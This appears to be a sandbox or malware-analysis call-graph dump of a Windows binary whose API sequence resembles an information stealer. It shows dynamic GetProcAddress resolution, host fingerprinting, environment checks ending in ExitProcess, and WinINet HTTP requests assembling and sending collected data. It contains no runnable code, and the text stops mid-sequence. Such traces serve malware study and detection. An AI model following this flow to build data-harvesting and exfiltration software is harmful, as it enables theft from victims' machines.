14401->14402 14403 6d3dc0 14402->14403 14404 6d45c0 2 API calls 14403->14404 14405 6d3dd9 14404->14405 14406 6d45c0 2 API calls 14405->14406 14407 6d3df2 14406->14407 14408 6d45c0 2 API calls 14407->14408 14409 6d3e0b 14408->14409 14410 6d45c0 2 API calls 14409->14410 14411 6d3e24 14410->14411 14412 6d45c0 2 API calls 14411->14412 14413 6d3e3d 14412->14413 14414 6d45c0 2 API calls 14413->14414 14415 6d3e56 14414->14415 14416 6d45c0 2 API calls 14415->14416 14417 6d3e6f 14416->14417 14418 6d45c0 2 API calls 14417->14418 14419 6d3e88 14418->14419 14420 6d45c0 2 API calls 14419->14420 14421 6d3ea1 14420->14421 14422 6d45c0 2 API calls 14421->14422 14423 6d3eba 14422->14423 14424 6d45c0 2 API calls 14423->14424 14425 6d3ed3 14424->14425 14426 6d45c0 2 API calls 14425->14426 14427 6d3eec 14426->14427 14428 6d45c0 2 API calls 14427->14428 14429 6d3f05 14428->14429 14430 6d45c0 2 API calls 14429->14430 14431 6d3f1e 14430->14431 14432 6d45c0 2 API calls 14431->14432 14433 6d3f37 14432->14433 14434 6d45c0 2 API calls 14433->14434 14435 6d3f50 14434->14435 14436 6d45c0 2 API calls 14435->14436 14437 6d3f69 14436->14437 14438 6d45c0 2 API calls 14437->14438 14439 6d3f82 14438->14439 14440 6d45c0 2 API calls 14439->14440 14441 6d3f9b 14440->14441 14442 6d45c0 2 API calls 14441->14442 14443 6d3fb4 14442->14443 14444 6d45c0 2 API calls 14443->14444 14445 6d3fcd 14444->14445 14446 6d45c0 2 API calls 14445->14446 14447 6d3fe6 14446->14447 14448 6d45c0 2 API calls 14447->14448 14449 6d3fff 14448->14449 14450 6d45c0 2 API calls 14449->14450 14451 6d4018 14450->14451 14452 6d45c0 2 API calls 14451->14452 14453 6d4031 14452->14453 14454 6d45c0 2 API calls 14453->14454 14455 6d404a 14454->14455 14456 6d45c0 2 API calls 14455->14456 14457 6d4063 14456->14457 14458 6d45c0 2 API calls 14457->14458 14459 6d407c 14458->14459 14460 6d45c0 2 API calls 14459->14460 14461 6d4095 14460->14461 14462 6d45c0 2 API calls 14461->14462 14463 6d40ae 14462->14463 14464 6d45c0 2 API calls 14463->14464 14465 6d40c7 14464->14465 14466 6d45c0 2 API calls 14465->14466 14467 6d40e0 14466->14467 14468 6d45c0 2 API calls 14467->14468 14469 6d40f9 14468->14469 14470 6d45c0 2 API calls 14469->14470 14471 6d4112 14470->14471 14472 6d45c0 2 API calls 14471->14472 14473 6d412b 14472->14473 14474 6d45c0 2 API calls 14473->14474 14475 6d4144 14474->14475 14476 6d45c0 2 API calls 14475->14476 14477 6d415d 14476->14477 14478 6d45c0 2 API calls 14477->14478 14479 6d4176 14478->14479 14480 6d45c0 2 API calls 14479->14480 14481 6d418f 14480->14481 14482 6d45c0 2 API calls 14481->14482 14483 6d41a8 14482->14483 14484 6d45c0 2 API calls 14483->14484 14485 6d41c1 14484->14485 14486 6d45c0 2 API calls 14485->14486 14487 6d41da 14486->14487 14488 6d45c0 2 API calls 14487->14488 14489 6d41f3 14488->14489 14490 6d45c0 2 API calls 14489->14490 14491 6d420c 14490->14491 14492 6d45c0 2 API calls 14491->14492 14493 6d4225 14492->14493 14494 6d45c0 2 API calls 14493->14494 14495 6d423e 14494->14495 14496 6d45c0 2 API calls 14495->14496 14497 6d4257 14496->14497 14498 6d45c0 2 API calls 14497->14498 14499 6d4270 14498->14499 14500 6d45c0 2 API calls 14499->14500 14501 6d4289 14500->14501 14502 6d45c0 2 API calls 14501->14502 14503 6d42a2 14502->14503 14504 6d45c0 2 API calls 14503->14504 14505 6d42bb 14504->14505 14506 6d45c0 2 API calls 14505->14506 14507 6d42d4 14506->14507 14508 6d45c0 2 API calls 14507->14508 14509 6d42ed 14508->14509 14510 6d45c0 2 API calls 14509->14510 14511 6d4306 14510->14511 14512 6d45c0 2 API calls 14511->14512 14513 6d431f 14512->14513 14514 6d45c0 2 API calls 14513->14514 14515 6d4338 14514->14515 14516 6d45c0 2 API calls 14515->14516 14517 6d4351 14516->14517 14518 6d45c0 2 API calls 14517->14518 14519 6d436a 14518->14519 14520 6d45c0 2 API calls 14519->14520 14521 6d4383 14520->14521 14522 6d45c0 2 API calls 14521->14522 14523 6d439c 14522->14523 14524 6d45c0 2 API calls 14523->14524 14525 6d43b5 14524->14525 14526 6d45c0 2 API calls 14525->14526 14527 6d43ce 14526->14527 14528 6d45c0 2 API calls 14527->14528 14529 6d43e7 14528->14529 14530 6d45c0 2 API calls 14529->14530 14531 6d4400 14530->14531 14532 6d45c0 2 API calls 14531->14532 14533 6d4419 14532->14533 14534 6d45c0 2 API calls 14533->14534 14535 6d4432 14534->14535 14536 6d45c0 2 API calls 14535->14536 14537 6d444b 14536->14537 14538 6d45c0 2 API calls 14537->14538 14539 6d4464 14538->14539 14540 6d45c0 2 API calls 14539->14540 14541 6d447d 14540->14541 14542 6d45c0 2 API calls 14541->14542 14543 6d4496 14542->14543 14544 6d45c0 2 API calls 14543->14544 14545 6d44af 14544->14545 14546 6d45c0 2 API calls 14545->14546 14547 6d44c8 14546->14547 14548 6d45c0 2 API calls 14547->14548 14549 6d44e1 14548->14549 14550 6d45c0 2 API calls 14549->14550 14551 6d44fa 14550->14551 14552 6d45c0 2 API calls 14551->14552 14553 6d4513 14552->14553 14554 6d45c0 2 API calls 14553->14554 14555 6d452c 14554->14555 14556 6d45c0 2 API calls 14555->14556 14557 6d4545 14556->14557 14558 6d45c0 2 API calls 14557->14558 14559 6d455e 14558->14559 14560 6d45c0 2 API calls 14559->14560 14561 6d4577 14560->14561 14562 6d45c0 2 API calls 14561->14562 14563 6d4590 14562->14563 14564 6d45c0 2 API calls 14563->14564 14565 6d45a9 14564->14565 14566 6e9c10 14565->14566 14567 6ea036 8 API calls 14566->14567 14568 6e9c20 43 API calls 14566->14568 14569 6ea0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14567->14569 14570 6ea146 14567->14570 14568->14567 14569->14570 14571 6ea216 14570->14571 14572 6ea153 8 API calls 14570->14572 14573 6ea21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14571->14573 14574 6ea298 14571->14574 14572->14571 14573->14574 14575 6ea337 14574->14575 14576 6ea2a5 6 API calls 14574->14576 14577 6ea41f 14575->14577 14578 6ea344 9 API calls 14575->14578 14576->14575 14579 6ea428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14577->14579 14580 6ea4a2 14577->14580 14578->14577 14579->14580 14581 6ea4dc 14580->14581 14582 6ea4ab GetProcAddress GetProcAddress 14580->14582 14583 6ea515 14581->14583 14584 6ea4e5 GetProcAddress GetProcAddress 14581->14584 14582->14581 14585 6ea612 14583->14585 14586 6ea522 10 API calls 14583->14586 14584->14583 14587 6ea67d 14585->14587 14588 6ea61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14588 14586->14585 14589 6ea69e 14587->14589 14590 6ea686 GetProcAddress 14587->14590 14588->14587 14591 6e5ca3 14589->14591 14592 6ea6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14589->14592 14590->14589 14593 6d1590 14591->14593 14592->14591 15714 6d1670 14593->15714 14596 6ea7a0 lstrcpy 14597 6d15b5 14596->14597 14598 6ea7a0 lstrcpy 14597->14598 14599 6d15c7 14598->14599 14600 6ea7a0 lstrcpy 14599->14600 14601 6d15d9 14600->14601 14602 6ea7a0 lstrcpy 14601->14602 14603 6d1663 14602->14603 14604 6e5510 14603->14604 14605 6e5521 14604->14605 14606 6ea820 2 API calls 14605->14606 14607 6e552e 14606->14607 14608 6ea820 2 API calls 14607->14608 14609 6e553b 14608->14609 14610 6ea820 2 API calls 14609->14610 14611 6e5548 14610->14611 14612 6ea740 lstrcpy 14611->14612 14613 6e5555 14612->14613 14614 6ea740 lstrcpy 14613->14614 14615 6e5562 14614->14615 14616 6ea740 lstrcpy 14615->14616 14617 6e556f 14616->14617 14618 6ea740 lstrcpy 14617->14618 14643 6e557c 14618->14643 14619 6d1590 lstrcpy 14619->14643 14620 6e52c0 25 API calls 14620->14643 14621 6e5643 StrCmpCA 14621->14643 14622 6e56a0 StrCmpCA 14623 6e57dc 14622->14623 14622->14643 14624 6ea8a0 lstrcpy 14623->14624 14625 6e57e8 14624->14625 14626 6ea820 2 API calls 14625->14626 14627 6e57f6 14626->14627 14629 6ea820 2 API calls 14627->14629 14628 6e5856 StrCmpCA 14630 6e5991 14628->14630 14628->14643 14634 6e5805 14629->14634 14633 6ea8a0 lstrcpy 14630->14633 14631 6ea740 lstrcpy 14631->14643 14632 6ea8a0 lstrcpy 14632->14643 14635 6e599d 14633->14635 14636 6d1670 lstrcpy 14634->14636 14638 6ea820 2 API calls 14635->14638 14639 6e5811 14636->14639 14637 6ea820 lstrlen lstrcpy 14637->14643 14640 6e59ab 14638->14640 14639->13711 14644 6ea820 2 API calls 14640->14644 14641 6e5a0b StrCmpCA 14645 6e5a28 14641->14645 14646 6e5a16 Sleep 14641->14646 14642 6ea7a0 lstrcpy 14642->14643 14643->14619 14643->14620 14643->14621 14643->14622 14643->14628 14643->14631 14643->14632 14643->14637 14643->14641 14643->14642 14653 6e51f0 20 API calls 14643->14653 14656 6e578a StrCmpCA 14643->14656 14658 6e593f StrCmpCA 14643->14658 14648 6e59ba 14644->14648 14647 6ea8a0 lstrcpy 14645->14647 14646->14643 14649 6e5a34 14647->14649 14650 6d1670 lstrcpy 14648->14650 14651 6ea820 2 API calls 14649->14651 14650->14639 14652 6e5a43 14651->14652 14654 6ea820 2 API calls 14652->14654 14653->14643 14655 6e5a52 14654->14655 14657 6d1670 lstrcpy 14655->14657 14656->14643 14657->14639 14658->14643 14660 6e754c 14659->14660 14661 6e7553 GetVolumeInformationA 14659->14661 14660->14661 14662 6e7591 14661->14662 14663 6e75fc GetProcessHeap RtlAllocateHeap 14662->14663 14664 6e7628 wsprintfA 14663->14664 14665 6e7619 14663->14665 14667 6ea740 lstrcpy 14664->14667 14666 6ea740 lstrcpy 14665->14666 14668 6e5da7 14666->14668 14667->14668 14668->13732 14670 6ea7a0 lstrcpy 14669->14670 14671 6d4899 14670->14671 15723 6d47b0 14671->15723 14673 6d48a5 14674 6ea740 lstrcpy 14673->14674 14675 6d48d7 14674->14675 14676 6ea740 lstrcpy 14675->14676 14677 6d48e4 14676->14677 14678 6ea740 lstrcpy 14677->14678 14679 6d48f1 14678->14679 14680 6ea740 lstrcpy 14679->14680 14681 6d48fe 14680->14681 14682 6ea740 lstrcpy 14681->14682 14683 6d490b InternetOpenA StrCmpCA 14682->14683 14684 6d4944 14683->14684 14685 6d4ecb InternetCloseHandle 14684->14685 15729 6e8b60 14684->15729 14686 6d4ee8 14685->14686 15744 6d9ac0 CryptStringToBinaryA 14686->15744 14688 6d4963 15737 6ea920 14688->15737 14691 6d4976 14693 6ea8a0 lstrcpy 14691->14693 14698 6d497f 14693->14698 14694 6ea820 2 API calls 14695 6d4f05 14694->14695 14696 6ea9b0 4 API calls 14695->14696 14699 6d4f1b 14696->14699 14697 6d4f27 ctype 14700 6ea7a0 lstrcpy 14697->14700 14702 6ea9b0 4 API calls 14698->14702 14701 6ea8a0 lstrcpy 14699->14701 14713 6d4f57 14700->14713 14701->14697 14703 6d49a9 14702->14703 14704 6ea8a0 lstrcpy 14703->14704 14705 6d49b2 14704->14705 14706 6ea9b0 4 API calls 14705->14706 14707 6d49d1 14706->14707 14708 6ea8a0 lstrcpy 14707->14708 14709 6d49da 14708->14709 14710 6ea920 3 API calls 14709->14710 14711 6d49f8 14710->14711 14712 6ea8a0 lstrcpy 14711->14712 14714 6d4a01 14712->14714 14713->13735 14715 6ea9b0 4 API calls 14714->14715 14716 6d4a20 14715->14716 14717 6ea8a0 lstrcpy 14716->14717 14718 6d4a29 14717->14718 14719 6ea9b0 4 API calls 14718->14719 14720 6d4a48 14719->14720 14721 6ea8a0 lstrcpy 14720->14721 14722 6d4a51 14721->14722 14723 6ea9b0 4 API calls 14722->14723 14724 6d4a7d 14723->14724 14725 6ea920 3 API calls 14724->14725 14726 6d4a84 14725->14726 14727 6ea8a0 lstrcpy 14726->14727 14728 6d4a8d 14727->14728 14729 6d4aa3 InternetConnectA 14728->14729 14729->14685 14730 6d4ad3 HttpOpenRequestA 14729->14730 14732 6d4ebe InternetCloseHandle 14730->14732 14733 6d4b28 14730->14733 14732->14685 14734 6ea9b0 4 API calls 14733->14734 14735 6d4b3c 14734->14735 14736 6ea8a0 lstrcpy 14735->14736 14737 6d4b45 14736->14737 14738 6ea920 3 API calls 14737->14738 14739 6d4b63 14738->14739 14740 6ea8a0 lstrcpy 14739->14740 14741 6d4b6c 14740->14741 14742 6ea9b0 4 API calls 14741->14742 14743 6d4b8b 14742->14743 14744 6ea8a0 lstrcpy 14743->14744 14745 6d4b94 14744->14745 14746 6ea9b0 4 API calls 14745->14746 14747 6d4bb5 14746->14747 14748 6ea8a0 lstrcpy 14747->14748 14749 6d4bbe 14748->14749 14750 6ea9b0 4 API calls 14749->14750 14751 6d4bde 14750->14751 14752 6ea8a0 lstrcpy 14751->14752 14753 6d4be7 14752->14753 14754 6ea9b0 4 API calls 14753->14754 14755 6d4c06 14754->14755 14756 6ea8a0 lstrcpy 14755->14756 14757 6d4c0f 14756->14757 14758 6ea920 3 API calls 14757->14758 14759 6d4c2d 14758->14759 14760 6ea8a0 lstrcpy 14759->14760 14761 6d4c36 14760->14761 14762 6ea9b0 4 API calls 14761->14762 14763 6d4c55 14762->14763 14764 6ea8a0 lstrcpy 14763->14764 14765 6d4c5e 14764->14765 14766 6ea9b0 4 API calls 14765->14766 14767 6d4c7d 14766->14767 14768 6ea8a0 lstrcpy 14767->14768 14769 6d4c86 14768->14769 14770 6ea920 3 API calls 14769->14770 14771 6d4ca4 14770->14771 14772 6ea8a0 lstrcpy 14771->14772 14773 6d4cad 14772->14773 14774 6ea9b0 4 API calls 14773->14774 14775 6d4ccc 14774->14775 14776 6ea8a0 lstrcpy 14775->14776 14777 6d4cd5 14776->14777 14778 6ea9b0 4 API calls 14777->14778 14779 6d4cf6 14778->14779 14780 6ea8a0 lstrcpy 14779->14780 14781 6d4cff 14780->14781 14782 6ea9b0 4 API calls 14781->14782 14783 6d4d1f 14782->14783 14784 6ea8a0 lstrcpy 14783->14784 14785 6d4d28 14784->14785 14786 6ea9b0 4 API calls 14785->14786 14787 6d4d47 14786->14787 14788 6ea8a0 lstrcpy 14787->14788 14789 6d4d50 14788->14789 14790 6ea920 3 API calls 14789->14790 14791 6d4d6e 14790->14791 14792 6ea8a0 lstrcpy 14791->14792 14793 6d4d77 14792->14793 14794 6ea740 lstrcpy 14793->14794 14795 6d4d92 14794->14795 14796 6ea920 3 API calls 14795->14796 14797 6d4db3 14796->14797 14798 6ea920 3 API calls 14797->14798 14799 6d4dba 14798->14799 14800 6ea8a0 lstrcpy 14799->14800 14801 6d4dc6 14800->14801 14802 6d4de7 lstrlen 14801->14802 14803 6d4dfa 14802->14803 14804 6d4e03 lstrlen 14803->14804 15743 6eaad0 14804->15743 14806 6d4e13 HttpSendRequestA 14807 6d4e32 InternetReadFile 14806->14807 14808 6d4e67 InternetCloseHandle 14807->14808 14813 6d4e5e 14807->14813 14811 6ea800 14808->14811 14810 6ea9b0 4 API calls 14810->14813 14811->14732 14812 6ea8a0 lstrcpy 14812->14813 14813->14807 14813->14808 14813->14810 14813->14812 15750 6eaad0 14814->15750 14816 6e17c4 StrCmpCA 14817 6e17cf ExitProcess 14816->14817 14821 6e17d7 14816->14821 14818 6e19c2 14818->13737 14819 6e18cf StrCmpCA 14819->14821 14820 6e18ad StrCmpCA 14820->14821 14821->14818 14821->14819 14821->14820 14822 6e187f StrCmpCA 14821->14822 14823 6e185d StrCmpCA 14821->14823 14824 6e1932 StrCmpCA 14821->14824 14825 6e1913 StrCmpCA 14821->14825 14826 6e1970 StrCmpCA 14821->14826 14827 6e18f1 StrCmpCA 14821->14827 14828 6e1951 StrCmpCA 14821->14828 14829 6ea820 lstrlen lstrcpy 14821->14829 14822->14821 14823->14821 14824->14821 14825->14821 14826->14821 14827->14821 14828->14821 14829->14821 14831 6ea7a0 lstrcpy 14830->14831 14832 6d5979 14831->14832 14833 6d47b0 2 API calls 14832->14833 14834 6d5985 14833->14834 14835 6ea740 lstrcpy 14834->14835 14836 6d59ba 14835->14836 14837 6ea740 lstrcpy 14836->14837 14838 6d59c7 14837->14838 14839 6ea740 lstrcpy 14838->14839 14840 6d59d4 14839->14840 14841 6ea740 lstrcpy 14840->14841 14842 6d59e1 14841->14842 14843 6ea740 lstrcpy 14842->14843 14844 6d59ee InternetOpenA StrCmpCA 14843->14844 14845 6d5a1d 14844->14845 14846 6d5fc3 InternetCloseHandle 14845->14846 14847 6e8b60 3 API calls 14845->14847 14848 6d5fe0 14846->14848 14849 6d5a3c 14847->14849 14851 6d9ac0 4 API calls 14848->14851 14850 6ea920 3 API calls 14849->14850 14852 6d5a4f 14850->14852 14853 6d5fe6 14851->14853 14854 6ea8a0 lstrcpy 14852->14854 14855 6ea820 2 API calls 14853->14855 14857 6d601f ctype 14853->14857 14859 6d5a58 14854->14859 14856 6d5ffd 14855->14856 14858 6ea9b0 4 API calls 14856->14858 14862 6ea7a0 lstrcpy 14857->14862 14860 6d6013 14858->14860 14863 6ea9b0 4 API calls 14859->14863 14861 6ea8a0 lstrcpy 14860->14861 14861->14857 14871 6d604f 14862->14871 14864 6d5a82 14863->14864 14865 6ea8a0 lstrcpy 14864->14865 14866 6d5a8b 14865->14866 14867 6ea9b0 4 API calls 14866->14867 14868 6d5aaa 14867->14868 14869 6ea8a0 lstrcpy 14868->14869 14870 6d5ab3 14869->14870 14872 6ea920 3 API calls 14870->14872 14871->13743 14873 6d5ad1 14872->14873 14874 6ea8a0 lstrcpy 14873->14874 14875 6d5ada 14874->14875 14876 6ea9b0 4 API calls 14875->14876 14877 6d5af9 14876->14877 14878 6ea8a0 lstrcpy 14877->14878 14879 6d5b02 14878->14879 14880 6ea9b0 4 API calls 14879->14880 14881 6d5b21 14880->14881 14882 6ea8a0 lstrcpy 14881->14882 14883 6d5b2a 14882->14883 14884 6ea9b0 4 API calls 14883->14884 14885 6d5b56 14884->14885 14886 6ea920 3 API calls 14885->14886 14887 6d5b5d 14886->14887 14888 6ea8a0 lstrcpy 14887->14888 14889 6d5b66 14888->14889 14890 6d5b7c InternetConnectA 14889->14890 14890->14846 14891 6d5bac HttpOpenRequestA 14890->14891 14893 6d5c0b 14891->14893 14894 6d5fb6 InternetCloseHandle 14891->14894 14895 6ea9b0 4 API calls 14893->14895 14894->14846 14896 6d5c1f 14895->14896 14897 6ea8a0 lstrcpy 14896->14897 14898 6d5c28 14897->14898 14899 6ea920 3 API calls 14898->14899 14900 6d5c46 14899->14900 14901 6ea8a0 lstrcpy 14900->14901 14902 6d5c4f 14901->14902 14903 6ea9b0 4 API calls 14902->14903 14904 6d5c6e 14903->14904 14905 6ea8a0 lstrcpy 14904->14905 14906 6d5c77 14905->14906 14907 6ea9b0 4 API calls 14906->14907 14908 6d5c98 14907->14908 14909 6ea8a0 lstrcpy 14908->14909 14910 6d5ca1 14909->14910 14911 6ea9b0 4 API calls 14910->14911 14912 6d5cc1 14911->14912 14913 6ea8a0 lstrcpy 14912->14913 14914 6d5cca 14913->14914 14915 6ea9b0 4 API calls 14914->14915 14916 6d5ce9 14915->14916 14917 6ea8a0 lstrcpy 14916->14917 14918 6d5cf2 14917->14918 14919 6ea920 3 API calls 14918->14919 14920 6d5d10 14919->14920 14921 6ea8a0 lstrcpy 14920->14921 14922 6d5d19 14921->14922 14923 6ea9b0 4 API calls 14922->14923 14924 6d5d38 14923->14924 14925 6ea8a0 lstrcpy 14924->14925 14926 6d5d41 14925->14926 14927 6ea9b0 4 API calls 14926->14927 14928 6d5d60 14927->14928 14929 6ea8a0 lstrcpy 14928->14929 14930 6d5d69 14929->14930 14931 6ea920 3 API calls 14930->14931 14932 6d5d87 14931->14932 14933 6ea8a0 lstrcpy 14932->14933 14934 6d5d90 14933->14934 14935 6ea9b0 4 API calls 14934->14935 14936 6d5daf 14935->14936 14937 6ea8a0 lstrcpy 14936->14937 14938 6d5db8 14937->14938 14939 6ea9b0 4 API calls 14938->14939 14940 6d5dd9 14939->14940 14941 6ea8a0 lstrcpy 14940->14941 14942 6d5de2 14941->14942 14943 6ea9b0 4 API calls 14942->14943 14944 6d5e02 14943->14944 14945 6ea8a0 lstrcpy 14944->14945 14946 6d5e0b 14945->14946 14947 6ea9b0 4 API calls 14946->14947 14948 6d5e2a 14947->14948 14949 6ea8a0 lstrcpy 14948->14949 14950 6d5e33 14949->14950 14951 6ea920 3 API calls 14950->14951 14952 6d5e54 14951->14952 14953 6ea8a0 lstrcpy 14952->14953 14954 6d5e5d 14953->14954 14955 6d5e70 lstrlen 14954->14955 15751 6eaad0 14955->15751 14957 6d5e81 lstrlen GetProcessHeap RtlAllocateHeap 15752 6eaad0 14957->15752 14959 6d5eae lstrlen 14960 6d5ebe 14959->14960 14961 6d5ed7 lstrlen 14960->14961 14962 6d5ee7 14961->14962 14963 6d5ef0 lstrlen 14962->14963 14964 6d5f03 14963->14964 14965 6d5f1a lstrlen 14964->14965 15753 6eaad0 14965->15753 14967 6d5f2a HttpSendRequestA 14968 6d5f35 InternetReadFile 14967->14968 14969 6d5f6a InternetCloseHandle 14968->14969 14973 6d5f61 14968->14973 14969->14894 14971 6ea9b0 4 API calls 14971->14973 14972 6ea8a0 lstrcpy 14972->14973 14973->14968 14973->14969 14973->14971 14973->14972 14976 6e1077 14974->14976 14975 6e1151 14975->13745 14976->14975 14977 6ea820 lstrlen lstrcpy 14976->14977 14977->14976 14980 6e0db7 14978->14980 14979 6e0f17 14979->13753 14980->14979 14981 6e0e27 StrCmpCA 14980->14981 14982 6e0e67 StrCmpCA 14980->14982 14983 6e0ea4 StrCmpCA 14980->14983 14984 6ea820 lstrlen lstrcpy 14980->14984 14981->14980 14982->14980 14983->14980 14984->14980 14988 6e0f67 14985->14988 14986 6e1044 14986->13761 14987 6e0fb2 StrCmpCA 14987->14988 14988->14986 14988->14987 14989 6ea820 lstrlen lstrcpy 14988->14989 14989->14988 14991 6ea740 lstrcpy 14990->14991 14992 6e1a26 14991->14992 14993 6ea9b0 4 API calls 14992->14993 14994 6e1a37 14993->14994 14995 6ea8a0 lstrcpy 14994->14995 14996 6e1a40 14995->14996 14997 6ea9b0 4 API calls 14996->14997 14998 6e1a5b 14997->14998 14999 6ea8a0 lstrcpy 14998->14999 15000 6e1a64 14999->15000 15001 6ea9b0 4 API calls 15000->15001 15002 6e1a7d 15001->15002 15003 6ea8a0 lstrcpy 15002->15003 15004 6e1a86 15003->15004 15005 6ea9b0 4 API calls 15004->15005 15006 6e1aa1 15005->15006 15007 6ea8a0 lstrcpy 15006->15007 15008 6e1aaa 15007->15008 15009 6ea9b0 4 API calls 15008->15009 15010 6e1ac3 15009->15010 15011 6ea8a0 lstrcpy 15010->15011 15012 6e1acc 15011->15012 15013 6ea9b0 4 API calls 15012->15013 15014 6e1ae7 15013->15014 15015 6ea8a0 lstrcpy 15014->15015 15016 6e1af0 15015->15016 15017 6ea9b0 4 API calls 15016->15017 15018 6e1b09 15017->15018 15019 6ea8a0 lstrcpy 15018->15019 15020 6e1b12 15019->15020 15021 6ea9b0 4 API calls 15020->15021 15022 6e1b2d 15021->15022 15023 6ea8a0 lstrcpy 15022->15023 15024 6e1b36 15023->15024 15025 6ea9b0 4 API calls 15024->15025 15026 6e1b4f 15025->15026 15027 6ea8a0 lstrcpy 15026->15027 15028 6e1b58 15027->15028 15029 6ea9b0 4 API calls 15028->15029 15030 6e1b76 15029->15030 15031 6ea8a0 lstrcpy 15030->15031 15032 6e1b7f 15031->15032 15033 6e7500 6 API calls 15032->15033 15034 6e1b96 15033->15034 15035 6ea920 3 API calls 15034->15035 15036 6e1ba9 15035->15036 15037 6ea8a0 lstrcpy 15036->15037 15038 6e1bb2 15037->15038 15039 6ea9b0 4 API calls 15038->15039 15040 6e1bdc 15039->15040 15041 6ea8a0 lstrcpy 15040->15041 15042 6e1be5 15041->15042 15043 6ea9b0 4 API calls 15042->15043 15044 6e1c05 15043->15044 15045 6ea8a0 lstrcpy 15044->15045 15046 6e1c0e 15045->15046 15754 6e7690 GetProcessHeap RtlAllocateHeap 15046->15754 15049 6ea9b0 4 API calls 15050 6e1c2e 15049->15050 15051 6ea8a0 lstrcpy 15050->15051 15052 6e1c37 15051->15052 15053 6ea9b0 4 API calls 15052->15053 15054 6e1c56 15053->15054 15055 6ea8a0 lstrcpy 15054->15055 15056 6e1c5f 15055->15056 15057 6ea9b0 4 API calls 15056->15057 15058 6e1c80 15057->15058 15059 6ea8a0 lstrcpy 15058->15059 15060 6e1c89 15059->15060 15761 6e77c0 GetCurrentProcess IsWow64Process 15060->15761 15063 6ea9b0 4 API calls 15064 6e1ca9 15063->15064 15065 6ea8a0 lstrcpy 15064->15065 15066 6e1cb2 15065->15066 15067 6ea9b0 4 API calls 15066->15067 15068 6e1cd1 15067->15068 15069 6ea8a0 lstrcpy 15068->15069 15070 6e1cda 15069->15070 15071 6ea9b0 4 API calls 15070->15071 15072 6e1cfb 15071->15072 15073 6ea8a0 lstrcpy 15072->15073 15074 6e1d04 15073->15074 15075 6e7850 3 API calls 15074->15075 15076 6e1d14 15075->15076 15077 6ea9b0 4 API calls 15076->15077 15078 6e1d24 15077->15078 15079 6ea8a0 lstrcpy 15078->15079 15080 6e1d2d 15079->15080 15081 6ea9b0 4 API calls 15080->15081 15082 6e1d4c 15081->15082 15083 6ea8a0 lstrcpy 15082->15083 15084 6e1d55 15083->15084 15085 6ea9b0 4 API calls 15084->15085 15086 6e1d75 15085->15086 15087 6ea8a0 lstrcpy 15086->15087 15088 6e1d7e 15087->15088 15089 6e78e0 3 API calls 15088->15089 15090 6e1d8e 15089->15090 15091 6ea9b0 4 API calls 15090->15091 15092 6e1d9e 15091->15092 15093 6ea8a0 lstrcpy 15092->15093 15094 6e1da7 15093->15094 15095 6ea9b0 4 API calls 15094->15095 15096 6e1dc6 15095->15096 15097 6ea8a0 lstrcpy 15096->15097 15098 6e1dcf 15097->15098 15099 6ea9b0 4 API calls 15098->15099 15100 6e1df0 15099->15100 15101 6ea8a0 lstrcpy 15100->15101 15102 6e1df9 15101->15102 15763 6e7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15102->15763 15105 6ea9b0 4 API calls 15106 6e1e19 15105->15106 15107 6ea8a0 lstrcpy 15106->15107 15108 6e1e22 15107->15108 15109 6ea9b0 4 API calls 15108->15109 15110 6e1e41 15109->15110 15111 6ea8a0 lstrcpy 15110->15111 15112 6e1e4a 15111->15112 15113 6ea9b0 4 API calls 15112->15113 15114 6e1e6b 15113->15114 15115 6ea8a0 lstrcpy 15114->15115 15116 6e1e74 15115->15116 15765 6e7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15116->15765 15119 6ea9b0 4 API calls 15120 6e1e94 15119->15120 15121 6ea8a0 lstrcpy 15120->15121 15122 6e1e9d 15121->15122 15123 6ea9b0 4 API calls 15122->15123 15124 6e1ebc 15123->15124 15125 6ea8a0 lstrcpy 15124->15125 15126 6e1ec5 15125->15126 15127 6ea9b0 4 API calls 15126->15127 15128 6e1ee5 15127->15128 15129 6ea8a0 lstrcpy 15128->15129 15130 6e1eee 15129->15130 15768 6e7b00 GetUserDefaultLocaleName 15130->15768 15133 6ea9b0 4 API calls 15134 6e1f0e 15133->15134 15135 6ea8a0 lstrcpy 15134->15135 15136 6e1f17 15135->15136 15137 6ea9b0 4 API calls 15136->15137 15138 6e1f36 15137->15138 15139 6ea8a0 lstrcpy 15138->15139 15140 6e1f3f 15139->15140 15141 6ea9b0 4 API calls 15140->15141 15142 6e1f60 15141->15142 15143 6ea8a0 lstrcpy 15142->15143 15144 6e1f69 15143->15144 15772 6e7b90 15144->15772 15146 6e1f80 15147 6ea920 3 API calls 15146->15147 15148 6e1f93 15147->15148 15149 6ea8a0 lstrcpy 15148->15149 15150 6e1f9c 15149->15150 15151 6ea9b0 4 API calls 15150->15151 15152 6e1fc6 15151->15152 15153 6ea8a0 lstrcpy 15152->15153 15154 6e1fcf 15153->15154 15155 6ea9b0 4 API calls 15154->15155 15156 6e1fef 15155->15156 15157 6ea8a0 lstrcpy 15156->15157 15158 6e1ff8 15157->15158 15784 6e7d80 GetSystemPowerStatus 15158->15784 15161 6ea9b0 4 API calls 15162 6e2018 15161->15162 15163 6ea8a0 lstrcpy 15162->15163 15164 6e2021 15163->15164 15165 6ea9b0 4 API calls 15164->15165 15166 6e2040 15165->15166 15167 6ea8a0 lstrcpy 15166->15167 15168 6e2049 15167->15168 15169 6ea9b0 4 API calls 15168->15169 15170 6e206a 15169->15170 15171 6ea8a0 lstrcpy 15170->15171 15172 6e2073 15171->15172 15173 6e207e GetCurrentProcessId 15172->15173 15786 6e9470 OpenProcess 15173->15786 15176 6ea920 3 API calls 15177 6e20a4 15176->15177 15178 6ea8a0 lstrcpy 15177->15178 15179 6e20ad 15178->15179 15180 6ea9b0 4 API calls 15179->15180 15181 6e20d7 15180->15181 15182 6ea8a0 lstrcpy 15181->15182 15183 6e20e0 15182->15183 15184 6ea9b0 4 API calls 15183->15184 15185 6e2100 15184->15185 15186 6ea8a0 lstrcpy 15185->15186 15187 6e2109 15186->15187 15791 6e7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15187->15791 15190 6ea9b0 4 API calls 15191 6e2129 15190->15191 15192 6ea8a0 lstrcpy 15191->15192 15193 6e2132 15192->15193 15194 6ea9b0 4 API calls 15193->15194 15195 6e2151 15194->15195 15196 